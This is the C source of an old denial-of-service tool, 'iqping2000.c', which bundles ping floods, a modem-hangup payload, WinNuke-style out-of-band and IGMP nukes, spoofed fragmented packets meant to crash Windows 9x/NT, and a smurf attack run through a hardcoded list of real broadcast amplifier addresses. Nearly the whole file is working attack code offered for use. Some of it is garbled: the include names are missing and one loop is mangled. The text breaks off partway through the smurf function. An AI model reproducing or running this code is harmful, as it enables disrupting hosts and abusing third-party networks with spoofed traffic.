/* Legion2000 Security Research coded by iqlord This code was released when I was a member of the iQ Team 2000. iqping2000.c (v1.1.1.4) -> destination '/bin' massive multi attacker, coded for the SLACK people...Enjoy! --- a rebuild from the nasty iqping attacker v1.3 --- --- greets to author(s) of trash2.c|kod.c|smurf.c (respect) --- - You need 'su' privileges to execute some attack(s). compile: gcc iqping2000.c -DLINUX -o /bin/iqping2 or try without the -DLINUX para... fixed slack8 problem with flood function... ey! Maximum greets to da Legion2000 and a funky spank to ntfx ;) [coded by iqlord] I don't teach...I learn ! */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define LOGFILE "iqping.logfile" #define USEREXIT signal(SIGINT,abort_inkeys) #define WDPORT 139 #define LARGE1 150 #define LARGE2 200 static unsigned const char *lred="\x1b[1;31m", *lgreen="\x1b[1;32m", *dgreen="\x1b[0;32m", *lwhite="\x1b[1;37m", *dwhite="\x1b[0;37m", *dos_packets="1500"; unsigned int smurf_packets=2000, // unlimited=0 nuke_packets=100; void abort_inkeys(int); void ip_resolve(const char *); void syntax(const char *); void error(int); void flood(const char *); void modem(const char *); void oob(unsigned char *); int dos(const char *,const char *); void nuke(const char *); void logfile(const char *,const char *); unsigned int randip(void); int resolve(const char *,unsigned int,struct sockaddr_in *); int sendwin98bug(struct sockaddr_in *,unsigned long); int send_winbomb(int,unsigned long,struct sockaddr_in *); int send_igmp(int,unsigned long,struct sockaddr_in *); unsigned short in_chksum(u_short *,int); void smurfsetup(int,struct sockaddr_in sin,u_long dest,int); void smurf(const char *); int complete(const char *,int); int main(int argc,char **argv) { if(argc<=3 || argc>=4) { if(argc==1) syntax(argv[0]); else if(argc==2) error(2); else if((argc==3)&&(strcmp(argv[2],"-flood")==0)) flood(argv[1]); else if((argc==3)&&(strcmp(argv[2],"-modem")==0)) modem(argv[1]); else if((argc==3)&&(strcmp(argv[2],"-oob")==0)) oob(argv[1]); else if((argc==3)&&(strcmp(argv[2],"-dos")==0)) dos(argv[1], dos_packets); else if((argc==3)&&(strcmp(argv[2],"-nuke")==0)) nuke(argv[1]); else if((argc==3)&&(strcmp(argv[2],"-smurf")==0)) smurf(argv[1]); else if((argc==3)&&(strcmp(argv[2],"-ip")==0)) ip_resolve(argv[1]); else error(3); } return(0); } void syntax(const char *software) { printf( "%ssyntax: %s%s%s <-option>\n" " <%soptions%s>\n" " %s-flood%s \tmassive icmp hex pattern flood\n" " %s-modem%s \tdisconnects some modems (+++ATH0)\n" " %s-oob%s \tsends oob attack (Win95 bluescreen)\n" " %s-dos%s \tsends random spoofed icmp/igmp (Win9x/NT crash)\n" " %s-nuke%s \tsends igmp nuke (Win98 bluescreen)\n" " %s-smurf%s \tsends spoofed icmp packets from various brodcasts\n" " %s-ip%s \tresolves a hostnames ip\n" "%s" ,dgreen,lgreen,software,dgreen,lwhite,dgreen,lgreen,dgreen,lgreen ,dgreen,lgreen,dgreen,lgreen,dgreen,lgreen,dgreen,lgreen,dgreen ,lgreen,dgreen,dwhite); exit(1); } void abort_inkeys(int ghost) { error(9); exit(1); } void ip_resolve(const char *host) { struct sockaddr_in sin; struct hostent *pHostentry; printf("%sip%s resolve loaded...\n",lwhite,dgreen); logfile(host,"ip"); if((pHostentry=gethostbyname(host))==NULL) error(6); memcpy(&sin.sin_addr.s_addr,pHostentry->h_addr,pHostentry->h_length); printf("%s%s%s ip -> %s%s\n" ,lgreen,host,dgreen,lgreen, inet_ntoa(sin.sin_addr.s_addr)); complete("done.",0); } void error(const int argc) { if(argc==1) return; else if(argc==2) fprintf(stderr,"%sinsufficient parameters!%s\n",lred,dwhite); else if(argc==3) fprintf(stderr,"%sunable to locate that function!%s\n",lred,dwhite); else if(argc==4) fprintf(stderr,"%sunable to create logfile!%s\n",lred,dwhite); else if(argc==5) fprintf(stderr,"%sunable to send!%s\n",lred,dwhite); else if(argc==6) fprintf(stderr,"%sunable to resolve host!%s\n",lred,dwhite); else if(argc==7) fprintf(stderr,"%sunable to open raw socket!%s\n",lred,dwhite); else if(argc==8) fprintf(stderr,"%sunable to connect to host!%s\n",lred,dwhite); else if(argc==9) fprintf(stderr,"%s\nattack aborted by user!%s\n",lred,dwhite); else fprintf(stderr,"%serror!%s\n",lred,dwhite); exit(1); } void flood(const char *victim) { unsigned static char flood_p[LARGE2]="/bin/ping -f -s 65400 -p 102b2b2b2b2b2070d "; printf("%sflood%s attack loaded...\n",lwhite,dgreen); logfile(victim,"flood"); strncat(flood_p,victim,strlen(victim)); system(flood_p); complete("done.",0); } void modem(const char *victim) { unsigned static char modem_p[LARGE1]="/bin/ping -c 9 -s 1234 -p 2b2b2b415448300d "; printf("%smodem%s attack loaded...\n",lwhite,dgreen); logfile(victim,"modem"); strncat(modem_p,victim,strlen(victim)); system(modem_p); complete("done.",0); } void oob(unsigned char *victim) { static char *_dmsg="0x0000001"; int s,x; int open_sock(int sock,char *ip,int prt) { struct sockaddr_in addr,spoofedaddr; struct sockaddr_in iqpw; struct hostent *host; struct hostent *ghbn; bzero((char *)&iqpw,sizeof(iqpw)); iqpw.sin_family=AF_INET; iqpw.sin_addr.s_addr=inet_addr(ip); iqpw.sin_port=htons(prt); printf("%soob%s attack loaded...\n",lwhite,dgreen); logfile(victim,"oob"); USEREXIT; if((ghbn=gethostbyname(ip))!=NULL) bcopy(ghbn->h_addr,(char *)&iqpw.sin_addr,ghbn->h_length); else if((iqpw.sin_addr.s_addr=inet_addr(ip))<0) { error(6); return(-3); } if(connect(sock,(struct sockaddr *)&iqpw,16)==-1) { error(8); close(sock); return(-4); } return(0); } if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) { error(7); exit(-1); } open_sock(s,victim,WDPORT); printf("sending %s",_dmsg); send(s,_dmsg,strlen(_dmsg),MSG_OOB); usleep(100000); close(s); complete("done.",1); } void logfile(const char *victim,const char *attack) { static char *show_t; FILE *file_p; time_t now; time(&now); show_t=asctime(localtime(&now)); if((file_p=fopen(LOGFILE,"a"))==NULL) error(4); if((strcmp(attack,"ip")==0)) fprintf(file_p,"resolved: %s using [%s] resolve. Date: %s" ,victim,attack,show_t); else fprintf(file_p,"attacked: %s using [%s] attack. Date: %s" ,victim,attack,show_t); fclose(file_p); } unsigned int randip(void) { struct hostent *he; struct sockaddr_in sin; char *buf=(char *)calloc(1,sizeof(char)*16); sprintf(buf,"%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1); inet_aton(buf,(struct in_addr *)&sin); return(sin.sin_addr.s_addr); } int resolve(const char *name,unsigned int port,struct sockaddr_in *addr) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family=AF_INET; addr->sin_addr.s_addr=inet_addr(name); if(addr->sin_addr.s_addr==-1) { if((host=gethostbyname(name))==NULL) error(6); addr->sin_family=host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port=htons(port); return(0); } unsigned short in_cksum(addr,len) u_short *addr; int len; { register int nleft=len; register u_short *w=addr; register int sum=0; u_short answer=0; while(nleft>1) { sum+=*w++; nleft-=2; } if(nleft==1) { *(u_char *)(&answer)=*(u_char *)w; sum+=answer; } sum=(sum>>16)+(sum & 0xffff); sum+=(sum>>16); answer=~sum; return(answer); } int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof) { int BIGIGMP = 1500; unsigned char *pkt; struct iphdr *ip; struct igmphdr *igmp; struct utsname *un; struct passwd *p; int i,s,id=(random()%40000)+500; pkt=(unsigned char *)calloc(1,BIGIGMP); ip=(struct iphdr *)pkt; igmp=(struct igmphdr *)(pkt+sizeof(struct iphdr)); ip->version=4; ip->ihl=(sizeof *ip)/4; ip->ttl=255; ip->tot_len=htons(BIGIGMP); ip->protocol=IPPROTO_IGMP; ip->id=htons(id); ip->frag_off=htons(IP_MF); ip->saddr=spoof; ip->daddr=victim->sin_addr.s_addr; ip->check=in_cksum((unsigned short *)ip,sizeof(struct iphdr)); igmp->type=0; igmp->group=0; igmp->csum=in_cksum((unsigned short *)igmp,sizeof(struct igmphdr)); for(i=sizeof(struct iphdr)+sizeof(struct igmphdr)+1; i3) ip->frag_off=htons(((BIGIGMP-20)*i)>>3); else ip->frag_off=htons(((BIGIGMP-20)*i)>>3 | IP_MF); sendto(s,pkt,BIGIGMP,0,victim,sizeof(struct sockaddr_in)); } free(pkt); close(s); return(0); } int send_winbomb(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; packet=(unsigned char *)malloc(sizeof(struct iphdr)+ sizeof(struct icmphdr)+8); ip=(struct iphdr *)packet; icmp=(struct icmphdr *)(packet+sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr)+sizeof(struct icmphdr)+8); ip->ihl=5; ip->version=4; ip->id=htons(1234); ip->frag_off |= htons(0x2000); ip->ttl=30; ip->protocol=IPPROTO_ICMP; ip->saddr=spoof_addr; ip->daddr=dest_addr->sin_addr.s_addr; ip->check=in_cksum(ip, sizeof(struct iphdr)); icmp->type=rand()%15; icmp->code=rand()%15; icmp->checksum=in_cksum(icmp,sizeof(struct icmphdr)+1); if(sendto(socket, packet, sizeof(struct iphdr)+ sizeof(struct icmphdr)+1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr))==-1) { return(-1); } ip->tot_len=htons(sizeof(struct iphdr)+sizeof(struct icmphdr)+8); ip->frag_off=htons(8>>3); ip->frag_off |=htons(0x2000); ip->check=in_cksum(ip,sizeof(struct iphdr)); icmp->type=rand()%15; icmp->code=rand()%15; icmp->checksum=0; if(sendto(socket, packet, sizeof(struct iphdr)+ sizeof(struct icmphdr)+8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr))==-1) { return(-1); } free(packet); return(0); } int send_igmp(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct igmphdr *igmp; int rc; packet=(unsigned char *)malloc(sizeof(struct iphdr)+ sizeof(struct igmphdr)+8); ip=(struct iphdr *)packet; igmp=(struct igmphdr *)(packet+sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr)+sizeof(struct igmphdr)+8); ip->ihl=5; ip->version= 4; ip->id=htons(34717); ip->frag_off=htons(0x2000); ip->ttl=255; ip->protocol=IPPROTO_IGMP; ip->saddr=spoof_addr; ip->daddr=dest_addr->sin_addr.s_addr; ip->check=in_cksum(ip, sizeof(struct iphdr)); igmp->type=8; igmp->code=0; if(sendto(socket, packet, sizeof(struct iphdr)+ sizeof(struct igmphdr)+1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr))==-1) { return(-1); } ip->tot_len=htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off=htons(8 >> 3); ip->version=4; ip->id=htons(34717); ip->frag_off |=htons(0x2000); ip->ttl=255; ip->protocol=IPPROTO_IGMP; ip->saddr=spoof_addr; ip->daddr=dest_addr->sin_addr.s_addr; ip->check=in_cksum(ip, sizeof(struct iphdr)); igmp->type=8; igmp->code=0; if(sendto(socket, packet, sizeof(struct iphdr)+ sizeof(struct igmphdr)+1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr))==-1) { return(-1); } ip->tot_len=htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off=htons(8 >> 3); ip->frag_off |=htons(0x2000); ip->check=in_cksum(ip, sizeof(struct iphdr)); igmp->type=0; igmp->code=0; if(sendto(socket, packet, sizeof(struct iphdr)+ sizeof(struct igmphdr)+8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr))==-1) { return(-1); } free(packet); return(0);} int dos(const char *victim,const char *pkts) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; printf("%sdos%s attack loaded...\n",lwhite,dgreen); logfile(victim,"dos"); USEREXIT; if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) error(7); src_addr=dest_addr.sin_addr.s_addr; if(resolve(victim,0,&dest_addr)==-1) { return(-1); } printf("sending %s packages to %s\n",pkts,victim); for(i=0;i<=atoi(pkts);i++) { fprintf(stderr,".");//debug->("%d ",i) if(send_winbomb(sock,randip(),&dest_addr)==-1 || send_igmp(sock, randip(),&dest_addr)==-1 || sendwin98bug(&dest_addr,randip())) error(8); usleep(10000); } complete("done.",1); } void nuke(const char *victim) { struct sockaddr_in sin; struct hostent *host; size_t maxpkt=nuke_packets+5; char buf[15000]; int sd; printf("%snuke%s attack loaded...\n",lwhite,dgreen); logfile(victim,"nuke"); USEREXIT; if((host=gethostbyname(victim))==NULL) { error(6); exit(1); } memcpy(&sin.sin_addr.s_addr,host->h_addr,host->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(WDPORT); if((sd=socket(AF_INET,SOCK_RAW,2))==-1) { error(7); exit(1); } if(-1==connect(sd,(struct sockaddr *)&sin,sizeof(sin))) { error(8); close(sd); exit(1); } printf("sending %d packages to %s\n",nuke_packets,victim); while(nuke_packets--) { usleep(40001); if(send(sd,buf,maxpkt,0)==-1) { error(5); close(sd); exit(1); } fprintf(stderr,"."); } usleep(10001); close(sd); complete("done.",1); } unsigned short in_chksum(u_short *addr,int len) { register int nleft=len; register int sum=0; u_short answer=0; while(nleft>1) { sum+=*addr++; nleft-=2; } if(nleft==1) { *(u_char *)(&answer)=*(u_char *)addr; sum+=answer; } sum=(sum>>16)+(sum+0xffff); sum+=(sum>>16); answer=~sum; return(answer); } void smurfsetup(int sock,struct sockaddr_in sin,u_long dest,int psize) { struct iphdr *ip; struct icmphdr *icmp; char *packet; packet=malloc(sizeof(struct iphdr)+sizeof(struct icmphdr)+psize); ip=(struct iphdr *)packet; icmp=(struct icmphdr *) (packet+sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr)+sizeof(struct icmphdr)+psize); ip->tot_len=htons(sizeof(struct iphdr)+sizeof(struct icmphdr)+psize); ip->ihl=5; ip->version=4; ip->ttl=255; ip->tos=0; ip->frag_off=0; ip->protocol=IPPROTO_ICMP; ip->saddr=sin.sin_addr.s_addr; ip->daddr=dest; ip->check=in_chksum((u_short *)ip,sizeof(struct iphdr)); icmp->type=8; icmp->code=0; icmp->checksum=in_chksum((u_short *)icmp,sizeof(struct icmphdr)+psize); sendto(sock,packet,sizeof(struct iphdr)+sizeof(struct icmphdr)+psize, 0,(struct sockaddr *)&sin,sizeof(struct sockaddr)); free(packet); } void smurf(const char *victim) { struct sockaddr_in sin; struct hostent *he; int i,sock,delay,sizebcast,pktsize,bcast=1,cycle=10; char *bcastaddr[]={ "199.171.190.0", "165.154.1.255", "205.139.4.255", "198.3.101.255", "204.71.177.0", "192.41.177.255", "206.13.28.255", "144.228.20.255", "206.137.184.255", "198.32.186.255", "130.63.236.255", "208.202.14.255", "208.131.162.255", "199.171.6.255", "207.124.104.255", "205.180.58.255", "198.3.98.0", "131.104.96.255", "143.43.32.0", "131.215.48.0", "204.117.214.0", "130.235.20.255", "206.79.254.255", "199.222.42.255", "204.71.242.255", "204.162.80.0", "128.194.103.255", "207.221.53.255", "207.126.113.255", "198.53.145.255", "209.25.21.255", "194.51.83.255", "207.51.48.255", "129.130.12.255", "192.231.221.255", "168.17.197.255", "198.242.55.255", "130.160.224.255", "128.83.40.255", "131.215.48.255", "169.130.10.255", "207.20.7.255", "163.179.1.0", "129.16.1.0", "128.122.27.255", "132.236.230.255", "198.32.146.255", "192.41.177.0", NULL }; printf("%ssmurf%s attack loaded...\n",lwhite,dgreen); logfile(victim,"smurf"); USEREXIT; if((he=gethostbyname(victim))==NULL) { error(6); exit(-1); } memcpy((caddr_t)&sin.sin_addr,he->h_addr,he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(0); sizebcast=0; delay=10000; pktsize=64; if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) { error(7); exit(-1); } setsockopt(sock,SOL_SOCKET,SO_BROADCAST,(char *)&bcast,sizeof(bcast)); if(smurf_packets==0) printf("sending unlimited packages to %s\n",victim); else printf("sending %d packages to %s\n",smurf_packets,victim); for(i=0;i